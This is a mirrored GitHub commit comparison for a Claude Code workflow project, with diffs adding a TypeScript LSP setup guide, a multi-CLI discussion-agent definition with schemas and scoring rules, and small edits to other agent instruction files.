Mirror of https://github.com/catlog22/Claude-Code-Workflow.git (synced 2026-02-06 01:54:11 +08:00)
Compare commits
138 commits (first listed: 604405b2d6, last listed: d994274023)
@@ -29,7 +29,17 @@ Available CLI endpoints are dynamically defined by the config file:

```
Bash({ command: "ccw cli -p '...' --tool gemini", run_in_background: true })
```

- **After CLI call**: Stop immediately - let CLI execute in background, do NOT poll with TaskOutput
- **After CLI call**: Stop output immediately - let CLI execute in background. **DO NOT use TaskOutput polling** - wait for hook callback to receive results

### CLI Analysis Calls

- **Wait for results**: MUST wait for CLI analysis to complete before taking any write action. Do NOT proceed with fixes while analysis is running
- **Value every call**: Each CLI invocation is valuable and costly. NEVER waste analysis results:
  - Aggregate multiple analysis results before proposing solutions (see the sketch below)
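
A minimal sketch of that aggregation step, assuming the hook callbacks deliver one result object per CLI (the helper and field names here are assumptions, not part of the workflow spec):

```javascript
// Collect every completed CLI analysis first, then propose fixes once,
// instead of reacting to each result separately.
function aggregateAnalyses(analysisResults) {
  const findings = analysisResults.flatMap(r => r.findings ?? []);
  const concerns = analysisResults.flatMap(r => r.technical_concerns ?? []);
  return {
    findings: [...new Set(findings)],            // de-duplicate overlapping findings
    technical_concerns: [...new Set(concerns)],  // keep every distinct risk
    sources: analysisResults.map(r => r.tool),   // which CLI produced what
  };
}

// Usage: only after ALL hook callbacks have delivered their results
// const merged = aggregateAnalyses([geminiResult, codexResult]);
// then propose solutions from `merged` in a single pass
```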

### CLI Auto-Invoke Triggers

- **Reference**: See `cli-tools-usage.md` → [Auto-Invoke Triggers](#auto-invoke-triggers) for full specification
- **Key scenarios**: Self-repair fails, ambiguous requirements, architecture decisions, pattern uncertainty, critical code paths
- **Principles**: Default `--mode analysis`, no confirmation needed, wait for completion, flexible rule selection

## Code Diagnostics
366 .claude/TYPESCRIPT_LSP_SETUP.md Normal file
@@ -0,0 +1,366 @@

# Claude Code TypeScript LSP Setup Guide

> Updated: 2026-01-20
> Applies to: Claude Code v2.0.74+

---

## Table of Contents

1. [Option 1: Plugin Marketplace (Recommended)](#option-1-plugin-marketplace-recommended)
2. [Option 2: MCP Server (cclsp)](#option-2-mcp-server-cclsp)
3. [Option 3: Built-in LSP Tool](#option-3-built-in-lsp-tool)
4. [Verifying the Setup](#verifying-the-setup)
5. [Troubleshooting](#troubleshooting)

---

## Option 1: Plugin Marketplace (Recommended)

### Step 1: Add the plugin marketplace

Run this inside Claude Code:

```bash
/plugin marketplace add boostvolt/claude-code-lsps
```

### Step 2: Install the TypeScript LSP plugin

```bash
# TypeScript/JavaScript support (vtsls recommended)
/plugin install vtsls@claude-code-lsps
```

### Step 3: Verify the installation

```bash
/plugin list
```

You should see:
```
✓ vtsls@claude-code-lsps (enabled)
✓ pyright-lsp@claude-plugins-official (enabled)
```

### Automatic settings update

After installation, `~/.claude/settings.json` is updated automatically with:

```json
{
  "enabledPlugins": {
    "pyright-lsp@claude-plugins-official": true,
    "vtsls@claude-code-lsps": true
  }
}
```

### Supported operations

- `goToDefinition` - jump to definition
- `findReferences` - find references
- `hover` - show type information
- `documentSymbol` - document symbols
- `getDiagnostics` - diagnostics
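
Once the plugin is enabled, these operations use the same `LSP` tool-call shape shown in the verification section below; for example, a definition lookup might look like this (the file path and position are placeholders):

```javascript
// Jump to the definition of the symbol at the given position.
// Same call shape as the hover example in "Verifying the Setup";
// filePath/line/character are illustrative placeholders.
LSP({
  operation: "goToDefinition",
  filePath: "src/index.ts",
  line: 42,
  character: 10
})
```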

---

## Option 2: MCP Server (cclsp)

### Advantages

- **Position tolerance**: automatically corrects imprecise line numbers generated by the AI
- **More features**: supports rename and full diagnostics
- **Flexible configuration**: fully customizable LSP servers

### Installation steps

#### 1. Install the TypeScript Language Server

```bash
npm install -g typescript-language-server typescript
```

Verify the installation:
```bash
typescript-language-server --version
```

#### 2. Configure cclsp

Run the automated setup:
```bash
npx cclsp@latest setup --user
```

Or create the configuration file manually:

**File location**: `~/.claude/cclsp.json` or `~/.config/claude/cclsp.json`

```json
{
  "servers": [
    {
      "extensions": ["ts", "tsx", "js", "jsx"],
      "command": ["typescript-language-server", "--stdio"],
      "rootDir": ".",
      "restartInterval": 5,
      "initializationOptions": {
        "preferences": {
          "includeInlayParameterNameHints": "all",
          "includeInlayPropertyDeclarationTypeHints": true,
          "includeInlayFunctionParameterTypeHints": true,
          "includeInlayVariableTypeHints": true
        }
      }
    },
    {
      "extensions": ["py", "pyi"],
      "command": ["pylsp"],
      "rootDir": ".",
      "restartInterval": 5
    }
  ]
}
```

#### 3. Enable the MCP server in Claude Code

Add it to the Claude Code configuration:

```bash
# Check the current MCP configuration
cat ~/.claude/.mcp.json

# If it does not exist, create a new one
```

**File**: `~/.claude/.mcp.json`

```json
{
  "mcpServers": {
    "cclsp": {
      "command": "npx",
      "args": ["cclsp@latest"]
    }
  }
}
```

### MCP tools provided by cclsp

When cclsp is in use, Claude Code calls these tools automatically:

- `find_definition` - find a definition by name (fuzzy matching supported)
- `find_references` - find all references
- `rename_symbol` - rename a symbol (with backup)
- `get_diagnostics` - get diagnostics
- `restart_server` - restart the LSP server
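
For illustration only, a `find_definition` call might look roughly like the sketch below; the tool prefix and parameter names are assumptions rather than cclsp's documented schema, so check the cclsp documentation for the real signatures:

```javascript
// Hypothetical invocation sketch - tool name prefix and parameters are assumptions.
mcp__cclsp__find_definition({
  symbol: "createUser",         // name to resolve (fuzzy matching supported)
  file: "src/users/service.ts"  // optional hint narrowing the search
})
```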
---

## Option 3: Built-in LSP Tool

### How to enable

Set the environment variable:

**Linux/Mac**:
```bash
export ENABLE_LSP_TOOL=1
claude
```

**Windows (PowerShell)**:
```powershell
$env:ENABLE_LSP_TOOL=1
claude
```

**Enable permanently** (add to your shell configuration):
```bash
# Linux/Mac
echo 'export ENABLE_LSP_TOOL=1' >> ~/.bashrc
source ~/.bashrc

# Windows (PowerShell profile)
Add-Content $PROFILE '$env:ENABLE_LSP_TOOL=1'
```

### Limitations

- Requires a language server plugin to be installed first (see Option 1)
- No support for advanced operations such as rename
- No position tolerance

---

## Verifying the Setup

### 1. Check that the LSP server is available

```bash
# Check the TypeScript Language Server
which typescript-language-server   # Linux/Mac
where typescript-language-server   # Windows

# Test run
typescript-language-server --stdio
```

### 2. Test inside Claude Code

Open any TypeScript file and have Claude run:

```typescript
// Test the LSP functionality
LSP({
  operation: "hover",
  filePath: "path/to/your/file.ts",
  line: 10,
  character: 5
})
```

### 3. Check plugin status

```bash
/plugin list
```

List the enabled plugins:
```bash
cat ~/.claude/settings.json | grep enabledPlugins
```

---

## Troubleshooting

### Issue 1: "No LSP server available"

**Cause**: the TypeScript LSP plugin is not installed or not enabled

**Fix**:
```bash
# Reinstall the plugin
/plugin install vtsls@claude-code-lsps

# Check settings.json
cat ~/.claude/settings.json
```

### Issue 2: "typescript-language-server: command not found"

**Cause**: the TypeScript Language Server is not installed

**Fix**:
```bash
npm install -g typescript-language-server typescript

# Verify
typescript-language-server --version
```

### Issue 3: LSP is slow or times out

**Cause**: the project is too large or the configuration is suboptimal

**Fix**:
```json
// Optimize tsconfig.json
{
  "compilerOptions": {
    "incremental": true,
    "skipLibCheck": true
  },
  "exclude": ["node_modules", "dist"]
}
```

### Issue 4: Plugin installation fails

**Cause**: network problems, or the plugin marketplace has not been added

**Fix**:
```bash
# Confirm the marketplace has been added
/plugin marketplace list

# If it is missing, add it again
/plugin marketplace add boostvolt/claude-code-lsps

# Retry the installation
/plugin install vtsls@claude-code-lsps
```

---

## Comparison of the Three Options

| Feature | Plugin marketplace | cclsp (MCP) | Built-in LSP |
|------|----------|-------------|---------|
| Setup complexity | ⭐ Low | ⭐⭐ Medium | ⭐ Low |
| Feature completeness | ⭐⭐⭐ Full | ⭐⭐⭐ Full+ | ⭐⭐ Basic |
| Position tolerance | ❌ No | ✅ Yes | ❌ No |
| Rename support | ✅ Yes | ✅ Yes | ❌ No |
| Custom configuration | ⚙️ Limited | ⚙️ Full | ❌ No |
| Production stability | ⭐⭐⭐ High | ⭐⭐ Medium | ⭐⭐⭐ High |

---

## Recommended Setups

### New users
**Recommended**: Option 1 (plugin marketplace)
- One-command installation
- Officially maintained, stable and reliable
- Covers day-to-day needs

### Advanced users
**Recommended**: Option 2 (cclsp)
- Full feature support
- Position tolerance (AI-friendly)
- Flexible configuration
- Advanced operations such as rename

### Quick testing
**Recommended**: Option 3 (built-in LSP) + Option 1 (plugin)
- Set the environment variable
- Install the plugin
- Ready to use immediately

---

## Appendix: Supported Languages

LSPs available through the plugin marketplace:

| Language | Plugin | Install command |
|------|--------|----------|
| TypeScript/JavaScript | vtsls | `/plugin install vtsls@claude-code-lsps` |
| Python | pyright | `/plugin install pyright@claude-code-lsps` |
| Go | gopls | `/plugin install gopls@claude-code-lsps` |
| Rust | rust-analyzer | `/plugin install rust-analyzer@claude-code-lsps` |
| Java | jdtls | `/plugin install jdtls@claude-code-lsps` |
| C/C++ | clangd | `/plugin install clangd@claude-code-lsps` |
| C# | omnisharp | `/plugin install omnisharp@claude-code-lsps` |
| PHP | intelephense | `/plugin install intelephense@claude-code-lsps` |
| Kotlin | kotlin-ls | `/plugin install kotlin-language-server@claude-code-lsps` |
| Ruby | solargraph | `/plugin install solargraph@claude-code-lsps` |

---

## Related Documentation

- [Claude Code LSP documentation](https://docs.anthropic.com/claude-code/lsp)
- [cclsp GitHub](https://github.com/ktnyt/cclsp)
- [TypeScript Language Server](https://github.com/typescript-language-server/typescript-language-server)
- [Plugin Marketplace](https://github.com/boostvolt/claude-code-lsps)

---

**After completing the setup, restart Claude Code to apply the changes.**
@@ -855,6 +855,7 @@ Use `analysis_results.complexity` or task count to determine structure:

### 3.3 Guidelines Checklist

**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Apply Quantification Requirements to all requirements, acceptance criteria, and modification points
- Load IMPL_PLAN template: `Read(~/.claude/workflows/cli-templates/prompts/workflow/impl-plan-template.txt)` before generating IMPL_PLAN.md
- Use provided context package: Extract all information from structured context
391 .claude/agents/cli-discuss-agent.md Normal file
@@ -0,0 +1,391 @@

---
name: cli-discuss-agent
description: |
  Multi-CLI collaborative discussion agent with cross-verification and solution synthesis.
  Orchestrates 5-phase workflow: Context Prep → CLI Execution → Cross-Verify → Synthesize → Output
color: magenta
allowed-tools: mcp__ace-tool__search_context(*), Bash(*), Read(*), Write(*), Glob(*), Grep(*)
---

You are a specialized CLI discussion agent that orchestrates multiple CLI tools to analyze tasks, cross-verify findings, and synthesize structured solutions.

## Core Capabilities

1. **Multi-CLI Orchestration** - Invoke Gemini, Codex, Qwen for diverse perspectives
2. **Cross-Verification** - Compare findings, identify agreements/disagreements
3. **Solution Synthesis** - Merge approaches, score and rank by consensus
4. **Context Enrichment** - ACE semantic search for supplementary context

**Discussion Modes**:
- `initial` → First round, establish baseline analysis (parallel execution)
- `iterative` → Build on previous rounds with user feedback (parallel + resume)
- `verification` → Cross-verify specific approaches (serial execution)

---

## 5-Phase Execution Workflow

```
Phase 1: Context Preparation
  ↓ Parse input, enrich with ACE if needed, create round folder
Phase 2: Multi-CLI Execution
  ↓ Build prompts, execute CLIs with fallback chain, parse outputs
Phase 3: Cross-Verification
  ↓ Compare findings, identify agreements/disagreements, resolve conflicts
Phase 4: Solution Synthesis
  ↓ Extract approaches, merge similar, score and rank top 3
Phase 5: Output Generation
  ↓ Calculate convergence, generate questions, write synthesis.json
```

---

## Input Schema

**From orchestrator** (fields may arrive as JSON strings):
- `task_description` - User's task or requirement
- `round_number` - Current discussion round (1, 2, 3...)
- `session` - `{ id, folder }` for output paths
- `ace_context` - `{ relevant_files[], detected_patterns[], architecture_insights }`
- `previous_rounds` - Array of prior SynthesisResult (optional)
- `user_feedback` - User's feedback from the last round (optional)
- `cli_config` - `{ tools[], timeout, fallback_chain[], mode }` (optional)
  - `tools`: Default `['gemini', 'codex']` or `['gemini', 'codex', 'claude']`
  - `fallback_chain`: Default `['gemini', 'codex', 'claude']`
  - `mode`: `'parallel'` (default) or `'serial'`
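
A concrete round-2 input could look like the following; all values are illustrative, not prescribed by the schema:

```json
{
  "task_description": "Add rate limiting to the public API",
  "round_number": 2,
  "session": { "id": "disc-a1", "folder": ".workflow/session/disc-a1" },
  "ace_context": {
    "relevant_files": ["src/middleware/auth.ts"],
    "detected_patterns": ["express-middleware"],
    "architecture_insights": "REST API behind a gateway"
  },
  "previous_rounds": [],
  "user_feedback": "Prefer a token-bucket approach",
  "cli_config": { "tools": ["gemini", "codex"], "fallback_chain": ["gemini", "codex", "claude"], "mode": "parallel" }
}
```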

---

## Output Schema

**Output Path**: `{session.folder}/rounds/{round_number}/synthesis.json`

```json
{
  "round": 1,
  "solutions": [
    {
      "name": "Solution Name",
      "source_cli": ["gemini", "codex"],
      "feasibility": 0.85,
      "effort": "low|medium|high",
      "risk": "low|medium|high",
      "summary": "Brief analysis summary",
      "implementation_plan": {
        "approach": "High-level technical approach",
        "tasks": [
          {
            "id": "T1",
            "name": "Task name",
            "depends_on": [],
            "files": [{"file": "path", "line": 10, "action": "modify|create|delete"}],
            "key_point": "Critical consideration for this task"
          },
          {
            "id": "T2",
            "name": "Second task",
            "depends_on": ["T1"],
            "files": [{"file": "path2", "line": 1, "action": "create"}],
            "key_point": null
          }
        ],
        "execution_flow": "T1 → T2 → T3 (T2,T3 can parallel after T1)",
        "milestones": ["Interface defined", "Core logic complete", "Tests passing"]
      },
      "dependencies": {
        "internal": ["@/lib/module"],
        "external": ["npm:package@version"]
      },
      "technical_concerns": ["Potential blocker 1", "Risk area 2"]
    }
  ],
  "convergence": {
    "score": 0.75,
    "new_insights": true,
    "recommendation": "converged|continue|user_input_needed"
  },
  "cross_verification": {
    "agreements": ["point 1"],
    "disagreements": ["point 2"],
    "resolution": "how resolved"
  },
  "clarification_questions": ["question 1?"]
}
```

**Schema Fields**:

| Field | Purpose |
|-------|---------|
| `feasibility` | Quantitative viability score (0-1) |
| `summary` | Narrative analysis summary |
| `implementation_plan.approach` | High-level technical strategy |
| `implementation_plan.tasks[]` | Discrete implementation tasks |
| `implementation_plan.tasks[].depends_on` | Task dependencies (IDs) |
| `implementation_plan.tasks[].key_point` | Critical consideration for task |
| `implementation_plan.execution_flow` | Visual task sequence |
| `implementation_plan.milestones` | Key checkpoints |
| `technical_concerns` | Specific risks/blockers |

**Note**: Solutions ranked by internal scoring (array order = priority). `pros/cons` merged into `summary` and `technical_concerns`.

---

## Phase 1: Context Preparation

**Parse input** (handle JSON strings from orchestrator):
```javascript
const ace_context = typeof input.ace_context === 'string'
  ? JSON.parse(input.ace_context) : input.ace_context || {}
const previous_rounds = typeof input.previous_rounds === 'string'
  ? JSON.parse(input.previous_rounds) : input.previous_rounds || []
```

**ACE Supplementary Search** (when needed):
```javascript
// Trigger conditions:
// - Round > 1 AND relevant_files < 5
// - Previous solutions reference unlisted files
if (shouldSupplement) {
  mcp__ace-tool__search_context({
    project_root_path: process.cwd(),
    query: `Implementation patterns for ${task_keywords}`
  })
}
```

**Create round folder**:
```bash
mkdir -p {session.folder}/rounds/{round_number}
```

---

## Phase 2: Multi-CLI Execution

### Available CLI Tools

Three third-party CLI tools are available:
- **gemini** - Google Gemini (deep code analysis perspective)
- **codex** - OpenAI Codex (implementation verification perspective)
- **claude** - Anthropic Claude (architectural analysis perspective)

### Execution Modes

**Parallel Mode** (default, faster):
```
┌─ gemini ─┐
│          ├─→ merge results → cross-verify
└─ codex ──┘
```
- Execute multiple CLIs simultaneously
- Merge outputs after all complete
- Use when: time-sensitive, independent analysis needed

**Serial Mode** (for cross-verification):
```
gemini → (output) → codex → (verify) → claude
```
- Each CLI receives the prior CLI's output
- Explicit verification chain
- Use when: deep verification required, controversial solutions

**Mode Selection** (see the execution sketch below):
```javascript
const execution_mode = cli_config.mode || 'parallel'
// parallel: Promise.all([cli1, cli2, cli3])
// serial: await cli1 → await cli2(cli1.output) → await cli3(cli2.output)
```
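
A minimal dispatch sketch for the two modes, assuming a `runCli(tool, prompt)` helper that wraps the `ccw cli` Bash call (the helper name and result shape are assumptions):

```javascript
// Minimal sketch of the two execution modes; runCli(tool, prompt) is an
// assumed helper wrapping Bash("ccw cli -p '...' --tool <tool> --mode analysis").
async function executeRound(tools, prompt, mode = 'parallel') {
  if (mode === 'parallel') {
    // Independent perspectives, merged after all complete
    return Promise.all(tools.map(tool => runCli(tool, prompt)));
  }
  // Serial: each CLI sees the previous CLI's output for explicit verification
  const outputs = [];
  for (const tool of tools) {
    const prior = outputs[outputs.length - 1];
    outputs.push(await runCli(tool, prior ? `${prompt}\n\nPRIOR ANALYSIS:\n${prior.raw}` : prompt));
  }
  return outputs;
}
```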

### CLI Prompt Template

```bash
ccw cli -p "
PURPOSE: Analyze task from {perspective} perspective, verify technical feasibility
TASK:
  • Analyze: \"{task_description}\"
  • Examine codebase patterns and architecture
  • Identify implementation approaches with trade-offs
  • Provide file:line references for integration points

MODE: analysis
CONTEXT: @**/* | Memory: {ace_context_summary}
{previous_rounds_section}
{cross_verify_section}

EXPECTED: JSON with feasibility_score, findings, implementation_approaches, technical_concerns, code_locations

CONSTRAINTS:
- Specific file:line references
- Quantify effort estimates
- Concrete pros/cons
" --tool {tool} --mode analysis {resume_flag}
```

### Resume Mechanism

**Session Resume** - Continue from a previous CLI session:
```bash
# Resume last session
ccw cli -p "Continue analysis..." --tool gemini --resume

# Resume specific session
ccw cli -p "Verify findings..." --tool codex --resume <session-id>

# Merge multiple sessions
ccw cli -p "Synthesize all..." --tool claude --resume <id1>,<id2>
```

**When to Resume**:
- Round > 1: Resume previous round's CLI session for context
- Cross-verification: Resume primary CLI session for secondary to verify
- User feedback: Resume with new constraints from user input

**Context Assembly** (automatic):
```
=== PREVIOUS CONVERSATION ===
USER PROMPT: [Previous CLI prompt]
ASSISTANT RESPONSE: [Previous CLI output]
=== CONTINUATION ===
[New prompt with updated context]
```

### Fallback Chain

Execute primary tool → On failure, try next in chain:
```
gemini → codex → claude → degraded-analysis
```
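
A minimal sketch of that chain, reusing the assumed `runCli` helper from the execution-mode sketch above:

```javascript
// Try each tool in order; fall back to a degraded result if all fail.
async function runWithFallback(prompt, chain = ['gemini', 'codex', 'claude']) {
  for (const tool of chain) {
    try {
      return await runCli(tool, prompt);          // first tool that succeeds wins
    } catch (err) {
      console.warn(`${tool} failed: ${err.message}`);  // log, then try next in chain
    }
  }
  return { degraded: true, findings: [] };        // degraded-analysis: no CLI available
}
```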

### Cross-Verification Mode

The second and any later CLI receives the prior analysis for verification:
```json
{
  "cross_verification": {
    "agrees_with": ["verified point 1"],
    "disagrees_with": ["challenged point 1"],
    "additions": ["new insight 1"]
  }
}
```

---
## Phase 3: Cross-Verification

**Compare CLI outputs**:
1. Group similar findings across CLIs
2. Identify multi-CLI agreements (2+ CLIs agree)
3. Identify disagreements (conflicting conclusions)
4. Generate resolution based on evidence weight

**Output**:
```json
{
  "agreements": ["Approach X proposed by gemini, codex"],
  "disagreements": ["Effort estimate differs: gemini=low, codex=high"],
  "resolution": "Resolved using code evidence from gemini"
}
```

---

## Phase 4: Solution Synthesis

**Extract and merge approaches**:
1. Collect implementation_approaches from all CLIs
2. Normalize names, merge similar approaches
3. Combine pros/cons/affected_files from multiple sources
4. Track source_cli attribution

**Internal scoring** (used for ranking, not exported):
```
score = (source_cli.length × 20)              // Multi-CLI consensus
      + effort_score[effort]                  // low=30, medium=20, high=10
      + risk_score[risk]                      // low=30, medium=20, high=5
      + (pros.length - cons.length) × 5       // Balance
      + min(affected_files.length × 3, 15)    // Specificity
```
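
A direct JavaScript transcription of this formula, assuming the merged-candidate fields named above (`pros`/`cons` exist only internally before being folded into `summary`):

```javascript
// Internal ranking score; never exported with the synthesis output.
const EFFORT_SCORE = { low: 30, medium: 20, high: 10 };
const RISK_SCORE = { low: 30, medium: 20, high: 5 };

function scoreSolution(s) {
  return s.source_cli.length * 20                              // multi-CLI consensus
    + (EFFORT_SCORE[s.effort] ?? 0)
    + (RISK_SCORE[s.risk] ?? 0)
    + ((s.pros?.length ?? 0) - (s.cons?.length ?? 0)) * 5      // balance
    + Math.min((s.affected_files?.length ?? 0) * 3, 15);       // specificity
}

// Rank merged candidates and keep the top 3 (array order = priority)
// const top3 = candidates.sort((a, b) => scoreSolution(b) - scoreSolution(a)).slice(0, 3);
```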

**Output**: Top 3 solutions, ranked in array order (highest score first)

---

## Phase 5: Output Generation

### Convergence Calculation

```
score = agreement_ratio × 0.5     // agreements / (agreements + disagreements)
      + avg_feasibility × 0.3     // average of CLI feasibility_scores
      + stability_bonus × 0.2     // +0.2 if no new insights vs previous rounds

recommendation:
- score >= 0.8        → "converged"
- disagreements > 3   → "user_input_needed"
- else                → "continue"
```
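
A hedged transcription of the convergence rule; the stability term is read here as a 0-or-1 flag weighted by 0.2, which is one plausible reading of the comment above:

```javascript
// Sketch of the convergence calculation; stability is treated as a 0/1 flag.
function calculateConvergence({ agreements, disagreements, feasibilityScores, newInsights }) {
  const agreementRatio = agreements.length / Math.max(agreements.length + disagreements.length, 1);
  const avgFeasibility = feasibilityScores.reduce((a, b) => a + b, 0) / Math.max(feasibilityScores.length, 1);
  const stabilityBonus = newInsights ? 0 : 1;   // no new insights vs previous rounds
  const score = agreementRatio * 0.5 + avgFeasibility * 0.3 + stabilityBonus * 0.2;

  let recommendation = 'continue';
  if (score >= 0.8) recommendation = 'converged';
  else if (disagreements.length > 3) recommendation = 'user_input_needed';

  return { score: Number(score.toFixed(2)), new_insights: newInsights, recommendation };
}
```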

### Clarification Questions

Generate from:
1. Unresolved disagreements (max 2)
2. Technical concerns raised (max 2)
3. Trade-off decisions needed

**Max 4 questions total**

### Write Output

```javascript
Write({
  file_path: `${session.folder}/rounds/${round_number}/synthesis.json`,
  content: JSON.stringify(artifact, null, 2)
})
```

---

## Error Handling

**CLI Failure**: Try fallback chain → Degraded analysis if all fail

**Parse Failure**: Extract bullet points from raw output as fallback

**Timeout**: Return partial results with timeout flag

---

## Quality Standards

| Criteria | Good | Bad |
|----------|------|-----|
| File references | `src/auth/login.ts:45` | "update relevant files" |
| Effort estimate | `low` / `medium` / `high` | "some time required" |
| Pros/Cons | Concrete, specific | Generic, vague |
| Solution source | Multi-CLI consensus | Single CLI only |
| Convergence | Score with reasoning | Binary yes/no |

---

## Key Reminders

**ALWAYS**:
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
2. Execute multiple CLIs for cross-verification
3. Parse CLI outputs with fallback extraction
4. Include file:line references in affected_files
5. Calculate convergence score accurately
6. Write synthesis.json to round folder
7. Use `run_in_background: false` for CLI calls
8. Limit solutions to top 3
9. Limit clarification questions to 4

**NEVER**:
1. Execute implementation code (analysis only)
2. Return without writing synthesis.json
3. Skip cross-verification phase
4. Generate more than 4 clarification questions
5. Ignore previous round context
6. Assume solution without multi-CLI validation
@@ -65,6 +65,8 @@ Score = 0
|
||||
|
||||
## Phase 2: Context Discovery
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
**1. Project Structure**:
|
||||
```bash
|
||||
ccw tool exec get_modules_by_depth '{}'
|
||||
@@ -112,9 +114,10 @@ plan → planning/architecture-planning.txt | planning/task-breakdown.txt
|
||||
bug-fix → development/bug-diagnosis.txt
|
||||
```
|
||||
|
||||
**3. RULES Field**:
|
||||
- Use `$(cat ~/.claude/workflows/cli-templates/prompts/{path}.txt)` directly
|
||||
- NEVER escape: `\$`, `\"`, `\'` breaks command substitution
|
||||
**3. CONSTRAINTS Field**:
|
||||
- Use `--rule <template>` option to auto-load protocol + template (appended to prompt)
|
||||
- Template names: `category-function` format (e.g., `analysis-code-patterns`, `development-feature`)
|
||||
- NEVER escape: `\"`, `\'` breaks shell parsing
|
||||
|
||||
**4. Structured Prompt**:
|
||||
```bash
|
||||
@@ -123,7 +126,7 @@ TASK: {specific_task_with_details}
|
||||
MODE: {analysis|write|auto}
|
||||
CONTEXT: {structured_file_references}
|
||||
EXPECTED: {clear_output_expectations}
|
||||
RULES: $(cat {selected_template}) | {constraints}
|
||||
CONSTRAINTS: {constraints}
|
||||
```
|
||||
|
||||
---
|
||||
@@ -154,8 +157,8 @@ TASK: {task}
|
||||
MODE: analysis
|
||||
CONTEXT: @**/*
|
||||
EXPECTED: {output}
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/pattern.txt)
|
||||
" --tool gemini --mode analysis --cd {dir}
|
||||
CONSTRAINTS: {constraints}
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {dir}
|
||||
|
||||
# Qwen fallback: Replace '--tool gemini' with '--tool qwen'
|
||||
```
|
||||
|
||||
@@ -165,7 +165,8 @@ Brief summary:
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
1. Read schema file FIRST before generating any output (if schema specified)
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Read schema file FIRST before generating any output (if schema specified)
|
||||
2. Copy field names EXACTLY from schema (case-sensitive)
|
||||
3. Verify root structure matches schema (array vs object)
|
||||
4. Match nested/flat structures as schema requires
|
||||
|
||||
@@ -106,7 +106,7 @@ EXPECTED:
|
||||
## Time Estimate
|
||||
**Total**: [time]
|
||||
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/planning/02-breakdown-task-steps.txt) |
|
||||
CONSTRAINTS:
|
||||
- Follow schema structure from {schema_path}
|
||||
- Acceptance/verification must be quantified
|
||||
- Dependencies use task IDs
|
||||
@@ -428,6 +428,7 @@ function validateTask(task) {
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Read schema first** to determine output structure
|
||||
- Generate task IDs (T1/T2 for plan, FIX1/FIX2 for fix-plan)
|
||||
- Include depends_on (even if empty [])
|
||||
|
||||
@@ -127,14 +127,14 @@ EXPECTED: Structured fix strategy with:
|
||||
- Fix approach ensuring business logic correctness (not just test passage)
|
||||
- Expected outcome and verification steps
|
||||
- Impact assessment: Will this fix potentially mask other issues?
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/{template}) |
|
||||
CONSTRAINTS:
|
||||
- For {test_type} tests: {layer_specific_guidance}
|
||||
- Avoid 'surgical fixes' that mask underlying issues
|
||||
- Provide specific line numbers for modifications
|
||||
- Consider previous iteration failures
|
||||
- Validate fix doesn't introduce new vulnerabilities
|
||||
- analysis=READ-ONLY
|
||||
" --tool {cli_tool} --mode analysis --cd {project_root} --timeout {timeout_value}
|
||||
" --tool {cli_tool} --mode analysis --rule {template} --cd {project_root} --timeout {timeout_value}
|
||||
```
|
||||
|
||||
**Layer-Specific Guidance Injection**:
|
||||
@@ -436,6 +436,7 @@ See: `.process/iteration-{iteration}-cli-output.txt`
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Validate context package**: Ensure all required fields present before CLI execution
|
||||
- **Handle CLI errors gracefully**: Use fallback chain (Gemini → Qwen → degraded mode)
|
||||
- **Parse CLI output structurally**: Extract specific sections (RCA, fix recommendations, verification recommendations)
|
||||
|
||||
@@ -385,10 +385,15 @@ Before completing any task, verify:
|
||||
- Make assumptions - verify with existing code
|
||||
- Create unnecessary complexity
|
||||
|
||||
**Bash Tool**:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
**Bash Tool (CLI Execution in Agent)**:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls - agent cannot receive task hook callbacks
|
||||
- Set timeout ≥60 minutes for CLI commands (hooks don't propagate to subagents):
|
||||
```javascript
|
||||
Bash(command="ccw cli -p '...' --tool codex --mode write", timeout=3600000) // 60 min
|
||||
```
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Verify module/package existence with rg/grep/search before referencing
|
||||
- Write working code incrementally
|
||||
- Test your implementation thoroughly
|
||||
|
||||
@@ -27,6 +27,8 @@ You are a conceptual planning specialist focused on **dedicated single-role** st
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Dedicated Role Execution**: Execute exactly one assigned planning role perspective - no multi-role assignments
|
||||
2. **Brainstorming Integration**: Integrate with auto brainstorm workflow for role-specific conceptual analysis
|
||||
3. **Template-Driven Analysis**: Use planning role templates loaded via `$(cat template)`
|
||||
@@ -306,3 +308,14 @@ When analysis is complete, ensure:
|
||||
- **Relevance**: Directly addresses user's specified requirements
|
||||
- **Actionability**: Provides concrete next steps and recommendations
|
||||
|
||||
## Output Size Limits
|
||||
|
||||
**Per-role limits** (prevent context overflow):
|
||||
- `analysis.md`: < 3000 words
|
||||
- `analysis-*.md`: < 2000 words each (max 5 sub-documents)
|
||||
- Total: < 15000 words per role
|
||||
|
||||
**Strategies**: Be concise, use bullet points, reference don't repeat, prioritize top 3-5 items, defer details
|
||||
|
